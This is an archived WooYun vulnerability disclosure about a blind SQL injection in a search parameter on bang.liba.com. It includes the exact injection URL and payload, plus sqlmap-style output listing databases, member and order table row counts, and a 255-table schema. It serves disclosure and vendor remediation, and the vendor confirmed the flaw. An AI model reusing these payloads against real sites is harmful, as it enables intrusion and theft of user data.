篱笆网某站奇葩SQL注入泄露大量数据 | wooyun-2015-0109151

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0109151

漏洞标题：

篱笆网某站奇葩SQL注入泄露大量数据

漏洞详情

披露状态：

2015-04-20：细节已通知厂商并且等待厂商处理中
2015-04-21：厂商已经确认，细节仅向厂商公开
2015-05-01：细节向核心白帽子及相关领域专家公开
2015-05-11：细节向普通白帽子公开
2015-05-21：细节向实习白帽子公开
2015-06-05：细节向公众公开

简要描述：

233

详细说明：

http://bang.liba.com/decorate/store/search?name=e%25'%20AND%203*2*1%3d6%20AND%20'000hI0j'%21%3d'000hI0j%25
根据3*2*1=6和!=6返回不同，猜测是盲注，但是很奇葩，直接跑，结果漏洞不存在。
加些某些字符才行。

漏洞证明：

---
Parameter: name (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: name=e%' AND 3*2*1=6 AND '000hI0j'!='000hI0j%%' AND 2847=2847 AND '%'='
---
back-end DBMS: MySQL 5
available databases [6]:
[*] haitao
[*] information_schema
[*] orchard
[*] orchard_page_view
[*] posts
[*] site
Database: orchard
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| bang_member | 346337  |
+-------------+---------+
Database: orchard
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| booking_order | 538967  |
+---------------+---------+
Database: orchard
[255 tables]
+-------------------------------------------+
| function                                  |
| accept_service                            |
| account                                   |
| account_bak                               |
| account_detail                            |
| account_detail_bak                        |
| account_point_detail                      |
| account_sequence                          |
| ads_page_view                             |
| advertising                               |
| advertising_alternative_material          |
| advertising_click_record                  |
| advertising_log                           |
| advertising_material                      |
| advertising_order                         |
| agreement                                 |
| agreement_bak                             |
| agreement_time_limit                      |
| album                                     |
| album_mark                                |
| album_picture                             |
| area                                      |
| audit_order_schedule                      |
| bang_member                               |
| bidding                                   |
| bidding_store                             |
| black_list                                |
| black_list_zone                           |
| blog                                      |
| blog_picture                              |
| blog_tag                                  |
| booking_modify                            |
| booking_order                             |
| booking_order_c1                          |
| booking_order_c100                        |
| booking_order_c101                        |
| booking_order_c134                        |
| booking_order_c148                        |
| booking_order_c161                        |
| booking_order_c2                          |
| booking_order_c3                          |
| booking_order_c64                         |
| booking_order_label                       |
| booking_order_notification                |
| booking_order_plug1                       |
| booking_order_report                      |
| booking_security_entry                    |
| booking_security_entry_result             |
| booking_sequence                          |
| brand_package_promotion_item              |
| brand_promotion_pic                       |
| building_home_category_amount             |
| business_remark                           |
| category                                  |
| category_group                            |
| category_modify                           |
| category_page_view                        |
| category_page_view_bak                    |
| category_revenue_statistics               |
| category_scenario_tag_pool_group          |
| category_team                             |
| channel                                   |
| channel_service_star_occupation           |
| color_style                               |
| comment                                   |
| comment_picture                           |
| comment_title                             |
| complaint                                 |
| complaint_remark                          |
| customer_tag                              |
| deco_faq                                  |
| deco_picture                              |
| decorate_home_show_store                  |
| decorate_home_show_store_usercase         |
| decoration_festival_signup                |
| dreamhouse                                |
| dreamhouse_picture                        |
| exciting_content_snapshot                 |
| expert_faq                                |
| expert_faq_reply                          |
| feedback                                  |
| filter                                    |
| filter_value                              |
| focus_advertisement                       |
| forum_advertising_order                   |
| get_address                               |
| grouping                                  |
| history_store_booking                     |
| image_compression_queue                   |
| join_promotion                            |
| keyword                                   |
| lesson_apply                              |
| lesson_category                           |
| liba_opr_log                              |
| liba_role                                 |
| liba_user                                 |
| liba_user_category                        |
| liba_user_role                            |
| life_home_store                           |
| list_style                                |
| live_news                                 |
| log_navigation                            |
| lottery_prize                             |
| lottery_yard                              |
| market_channel_data                       |
| market_home_ad                            |
| match_aircondition                        |
| match_aircondition_discuss                |
| match_aircondition_leader                 |
| match_aircondition_order                  |
| match_aircondition_picture                |
| match_aircondition_store                  |
| match_cupboard                            |
| match_cupboard_case                       |
| match_cupboard_discuss                    |
| match_cupboard_order                      |
| match_cupboard_package                    |
| match_cupboard_store                      |
| match_designer                            |
| match_designer_order                      |
| match_designer_praiselog                  |
| match_designer_work                       |
| match_designshow_consulting               |
| match_designshow_discuss                  |
| match_designshow_order                    |
| match_designshow_store                    |
| match_designshow_works                    |
| match_modelhouse                          |
| match_modelhouse_discuss                  |
| match_modelhouse_expert_consultation      |
| match_modelhouse_expert_faq               |
| match_modelhouse_expert_faq_reply         |
| match_modelhouse_modelhouse               |
| match_modelhouse_news                     |
| match_modelhouse_order                    |
| match_modelhouse_store                    |
| match_prize                               |
| match_secondhouse                         |
| match_secondhouse_discuss                 |
| match_secondhouse_house                   |
| match_secondhouse_order                   |
| match_secondhouse_store                   |
| match_secondhouse_vote                    |
| match_warm_discuss                        |
| match_warm_match                          |
| match_warm_order                          |
| match_warm_store                          |
| match_warm_work                           |
| merchant_lesson                           |
| mobile_area                               |
| mobile_check_code                         |
| mobile_check_msg                          |
| model_house                               |
| model_house_discuss                       |
| model_house_live                          |
| model_house_live_winners                  |
| model_house_msg                           |
| model_house_vote                          |
| navigation                                |
| notice                                    |
| notice_category                           |
| offline_booking_order                     |
| operation_log                             |
| order_label                               |
| order_number                              |
| page_view                                 |
| pic_persist_liba                          |
| project_leader                            |
| promotion                                 |
| promotion_branch                          |
| promotion_opr_log                         |
| promotion_record                          |
| promotion_section                         |
| protection_indicator                      |
| recommended_star                          |
| reset_password_request                    |
| schedule                                  |
| security_access_token                     |
| service_star                              |
| service_star_news                         |
| service_star_sequence                     |
| shopping_guide                            |
| special_activity                          |
| special_activity_item                     |
| special_promotion                         |
| star_category_configure                   |
| star_rank                                 |
| star_schedule                             |
| star_tag                                  |
| store                                     |
| store_account                             |
| store_account_warning                     |
| store_alias_id_mapping                    |
| store_archive                             |
| store_booking_order_report                |
| store_branch                              |
| store_contribution                        |
| store_distribution                        |
| store_diy_style                           |
| store_filter                              |
| store_im_statistics                       |
| store_info                                |
| store_introduce                           |
| store_level                               |
| store_level_function                      |
| store_mark                                |
| store_member_page_view_statistics         |
| store_modify                              |
| store_name_history                        |
| store_opr_log                             |
| store_page_info                           |
| store_page_view                           |
| store_page_view_statistics                |
| store_perhour_member_page_view_statistics |
| store_promotion_introduce                 |
| store_rank                                |
| store_rank_for_home                       |
| store_rank_standing                       |
| store_rank_standing_year                  |
| store_revenue_statistics                  |
| store_scaned_notice                       |
| store_search_cache                        |
| store_tag                                 |
| store_tariff                              |
| store_tender                              |
| store_tender_bidding                      |
| store_user                                |
| suspect_booking_order                     |
| tag                                       |
| tag_pool                                  |
| tag_pool_group                            |
| tender                                    |
| theme_data                                |
| theme_top_category                        |
| user_case                                 |
| user_case_picture                         |
| user_case_picture_bak                     |
| user_case_tag                             |
| user_case_tmp                             |
| user_case_tmp1                            |
| user_case_tmp_bak                         |
| user_guide                                |
| user_guide_tag_tmp                        |
| user_page_view                            |
| valid_page_view                           |
| valid_page_view_bak                       |
| valid_star_booking                        |
| valid_store_booking                       |
| vote                                      |
| vote_activity                             |
| vote_target                               |
| voter                                     |
| weather                                   |
| wechat                                    |
| winners                                   |
+-------------------------------------------+

修复方案：

版权声明：转载请注明来源紫霞仙子@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：14

确认时间：2015-04-21 12:27

厂商回复：

已安排修复

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源紫霞仙子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 紫霞仙子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源紫霞仙子@乌云